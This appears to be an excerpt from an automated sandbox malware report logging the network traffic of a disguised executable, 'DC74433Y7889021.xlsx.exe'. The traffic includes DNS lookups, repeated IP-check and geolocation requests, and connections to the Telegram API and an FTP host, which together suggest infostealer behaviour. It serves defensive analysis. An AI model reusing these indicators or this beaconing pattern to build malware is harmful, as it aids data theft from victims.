                                                    Jul 17, 2024 14:17:28.708431959 CEST6301449762213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.708527088 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.756150961 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.901737928 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.943676949 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:19:21.508196115 CEST4975621192.168.2.4213.189.52.181

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 17, 2024 14:17:01.783745050 CEST6006953192.168.2.41.1.1.1
                                                    Jul 17, 2024 14:17:01.792860031 CEST53600691.1.1.1192.168.2.4
                                                    Jul 17, 2024 14:17:03.382081032 CEST5936053192.168.2.41.1.1.1
                                                    Jul 17, 2024 14:17:03.389602900 CEST53593601.1.1.1192.168.2.4
                                                    Jul 17, 2024 14:17:13.927567005 CEST6219953192.168.2.41.1.1.1
                                                    Jul 17, 2024 14:17:13.934848070 CEST53621991.1.1.1192.168.2.4
                                                    Jul 17, 2024 14:17:20.426573992 CEST5803253192.168.2.41.1.1.1
                                                    Jul 17, 2024 14:17:20.437954903 CEST53580321.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 17, 2024 14:17:01.783745050 CEST192.168.2.41.1.1.10x9506Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:03.382081032 CEST192.168.2.41.1.1.10x5c94Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:13.927567005 CEST192.168.2.41.1.1.10x68e4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:20.426573992 CEST192.168.2.41.1.1.10xfbbfStandard query (0)s4.serv00.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:01.792860031 CEST1.1.1.1192.168.2.40x9506No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:03.389602900 CEST1.1.1.1192.168.2.40x5c94No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:03.389602900 CEST1.1.1.1192.168.2.40x5c94No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:13.934848070 CEST1.1.1.1192.168.2.40x68e4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                    Jul 17, 2024 14:17:20.437954903 CEST1.1.1.1192.168.2.40xfbbfNo error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • reallyfreegeoip.org
                                                    • api.telegram.org
                                                    • checkip.dyndns.org

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:01.821135998 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:03.038635015 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:02 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 859d0079b539d979bbb6b1ed03dd61bb
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Jul 17, 2024 14:17:03.044138908 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Jul 17, 2024 14:17:03.339458942 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:03 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 023c3762e62060880535a033191115e4
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Jul 17, 2024 14:17:04.600856066 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Jul 17, 2024 14:17:04.984718084 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:04 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 4a6ca620c556c209768e5f56c502ea50
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449736193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:05.627724886 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Jul 17, 2024 14:17:06.091027021 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:06 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 7380af36d66da57f2ece11d913cf5afd
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449738193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:06.720724106 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:07.212661028 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:07 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 493baadcba1ce1a917153014390ab0fc
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449741193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:07.824177980 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:08.317326069 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:08 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 4b22cebb0db6e7f9f67692854adb3510
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449744193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:08.932322979 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:09.408221960 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: ef4d2cc99a3cbf4f6221ac34457d36e6
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449746193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:10.284399033 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:10.763042927 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 95548904407e37f7c29d31a32535c21d
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449748193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:11.379313946 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:11.837635994 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: c1196921ce695464f4b273507b999a27
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449750193.122.130.0802992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 17, 2024 14:17:12.463634014 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Jul 17, 2024 14:17:13.264460087 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: ee7c406d4f87f249208bda1a83247a26
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Jul 17, 2024 14:17:13.265459061 CEST320INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: ee7c406d4f87f249208bda1a83247a26
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449733188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:04 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:04 UTC712INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:04 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52982
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i9O2dQ0WgQWrFFRNWC0RLjLdKHCBUNLIzoGt1dzRfs3qz5yHh7PDNEh%2BlY%2B1eTg1Wx%2FuEv47HfxY7USVxu9KU%2F3SsHah6l9TbuJ4IHfKLPL%2FyUbGe1PKTQdeh3eGFyuhH%2BPFZbcL"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ab27bb272b7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449735188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:05 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-07-17 12:17:05 UTC714INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:05 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52983
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U1dXsn%2BhRgSCLkABqd0%2BItwDfWLK2AIcHMibO1vfJKi9j5pBXp65lnbQ9%2Bql%2FLGuXKEJ6wEfxnnr0X8UyxvYJExNB%2FrgAVw%2Bd1QE7W%2FWnXQY8BBsfouIhOMntqUjg12ARhrIUzpu"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ab9bc0e8cc0-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449737188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:06 UTC710INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:06 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52984
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2FZUCcGNYvTp3SZPzRjTIjK2DH0KP2EJUA%2FTdlr9eWqI2sx4h9T4DdLW%2BoWxGkmu1TsXqHe6Gf6pSER7xF1RrEhlF9orBt2MU687%2Fy8J0L4SgkFAwT2CwaX6zbiKgJU%2BvNvHGQHW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ac08d09440c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449739188.114.97.34432992C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-17 12:17:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:07 UTC704INHTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:07 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52985
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2lAyArFnGK%2FcfzCTMp0nThylq5Et4h7ySSnmB8AEVBEUbyPfTL9OmJldvxru1fZ7uI97yhIn9LWB7J1ZZCxBxsy0T4rj02p1%2B6aboaeyQ2WJooptxskqOsc5puDOVfhJ1HoaUFmp"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ac77a91c466-EWR
                                                    alt-svc: h3=":443"; ma=86400
